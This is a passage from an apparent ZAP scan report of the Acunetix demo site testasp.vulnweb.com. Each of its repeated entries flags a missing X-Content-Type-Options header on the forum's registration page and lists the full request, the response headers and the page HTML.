is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div 